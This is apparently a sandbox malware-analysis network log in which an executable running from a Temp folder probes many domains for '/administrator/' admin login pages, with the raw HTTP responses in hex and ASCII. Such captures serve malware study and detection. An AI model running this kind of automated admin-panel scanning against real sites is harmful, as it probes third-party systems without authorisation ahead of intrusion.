Nov 30, 2023 11:22:36.730973959 CET	1254	IN	HTTP/1.1 200 OK date: Thu, 30 Nov 2023 10:22:36 GMT content-type: text/html; charset=utf-8 content-length: 1009 x-request-id: 7f46c281-0d45-430a-b10e-fda1cde88190 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wVJTwk78ADABDBAAGGXdn93WTY9repPpOdZqRXQN6rzkLpxM3ZEgFmfeHcpJpPmzvd3JruH7RTpIeHNhM9tO+Q== set-cookie: parking_session=7f46c281-0d45-430a-b10e-fda1cde88190; expires=Thu, 30 Nov 2023 10:37:36 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 56 4a 54 77 6b 37 38 41 44 41 42 44 42 41 41 47 47 58 64 6e 39 33 57 54 59 39 72 65 70 50 70 4f 64 5a 71 52 58 51 4e 36 72 7a 6b 4c 70 78 4d 33 5a 45 67 46 6d 66 65 48 63 70 4a 70 50 6d 7a 76 64 33 4a 72 75 48 37 52 54 70 49 65 48 4e 68 4d 39 74 4f 2b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wVJTwk78ADABDBAAGGXdn93WTY9repPpOdZqRXQN6rzkLpxM3ZEgFmfeHcpJpPmzvd3JruH7RTpIeHNhM9tO+Q==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link
Nov 30, 2023 11:22:36.731014967 CET	533	IN	Data Raw: 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 Data Ascii: rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Y0NmMyODEtMGQ0NS00MzBhLWIxMGUtZmRhMWNkZTg4MTkwIiwicGFnZV90aW1lIjoxNzAxMzM5NzU2LCJwYWdlX3
Nov 30, 2023 11:22:36.746500969 CET	533	IN	Data Raw: 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 Data Ascii: rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Y0NmMyODEtMGQ0NS00MzBhLWIxMGUtZmRhMWNkZTg4MTkwIiwicGFnZV90aW1lIjoxNzAxMzM5NzU2LCJwYWdlX3
Nov 30, 2023 11:22:37.500057936 CET	332	OUT	GET /administrator/index.php HTTP/1.1 Host: ia.eu Accept: / Accept-Encoding: deflate, gzip Cookie: parking_session=7f46c281-0d45-430a-b10e-fda1cde88190 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://ia.eu/administrator/
Nov 30, 2023 11:22:37.599888086 CET	1254	IN	HTTP/1.1 200 OK date: Thu, 30 Nov 2023 10:22:37 GMT content-type: text/html; charset=utf-8 content-length: 1077 x-request-id: 0f80e2d3-0cfa-4ee2-8fe6-63a81035f758 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fQpnycZfnIRAXRVgT2bpPRioIdWCqZxSBvDTtyKMaUvDSbbda8Hnh29xsR9qjYWmzucV1duU2+jUSeioxMs6kA== set-cookie: parking_session=7f46c281-0d45-430a-b10e-fda1cde88190; expires=Thu, 30 Nov 2023 10:37:37 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 51 70 6e 79 63 5a 66 6e 49 52 41 58 52 56 67 54 32 62 70 50 52 69 6f 49 64 57 43 71 5a 78 53 42 76 44 54 74 79 4b 4d 61 55 76 44 53 62 62 64 61 38 48 6e 68 32 39 78 73 52 39 71 6a 59 57 6d 7a 75 63 56 31 64 75 55 32 2b 6a 55 53 65 69 6f 78 4d 73 36 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fQpnycZfnIRAXRVgT2bpPRioIdWCqZxSBvDTtyKMaUvDSbbda8Hnh29xsR9qjYWmzucV1duU2+jUSeioxMs6kA==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pre
Nov 30, 2023 11:22:37.599899054 CET	593	IN	Data Raw: 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 Data Ascii: connect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Y0NmMyODEtMGQ0NS00MzBhLWIxMGUtZmRhMWNkZTg4MTkwIiwicGFnZV90aW1lIjoxNzAxMzM5NzU3LCJwYWdlX3VybCI6Im
Nov 30, 2023 11:22:37.614490032 CET	593	IN	Data Raw: 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 Data Ascii: connect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Y0NmMyODEtMGQ0NS00MzBhLWIxMGUtZmRhMWNkZTg4MTkwIiwicGFnZV90aW1lIjoxNzAxMzM5NzU3LCJwYWdlX3VybCI6Im

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	51376	104.238.144.219	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.093430996 CET	227	OUT	GET /administrator/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:37.224160910 CET	548	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:37 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/administrator/ Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/administrator/">here</a>.</p></body></html>
Nov 30, 2023 11:22:37.701781988 CET	236	OUT	GET /administrator/index.php HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:37.831882954 CET	566	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:37 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/administrator/index.php Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	52919	15.197.172.60	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.828490973 CET	222	OUT	GET /administrator/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:37.928652048 CET	929	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/administrator/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_YLKJbENFD/VOrYF+0KsAjaeHhxFK2Px5gxbKZLO8+26zhlhsVf4uXMF33jpmvhJC/Hz/LdWGVdfOQsKtLSohXA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:38.066935062 CET	349	OUT	GET /administrator/index.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.135719061 CET	929	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/administrator/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_YLKJbENFD/VOrYF+0KsAjaeHhxFK2Px5gxbKZLO8+26zhlhsVf4uXMF33jpmvhJC/Hz/LdWGVdfOQsKtLSohXA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:38.166822910 CET	938	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:38 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/administrator/index.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_ArL9A9iZlgklnT1EKhJ3dMHLC90uBWepW7mE9bgjzCcGh2Rk33W6LWAykRWHtUT8XReFvRv4Ii2OVCk32T26iQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	52915	145.14.30.248	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.828536034 CET	224	OUT	GET /administrator/ HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:38.042220116 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:37 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>
Nov 30, 2023 11:22:38.065591097 CET	272	OUT	GET /administrator/index.php HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://san.ee/administrator/
Nov 30, 2023 11:22:38.276475906 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:38 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	52916	3.64.163.50	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:37.828614950 CET	226	OUT	GET /administrator/ HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	52917	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
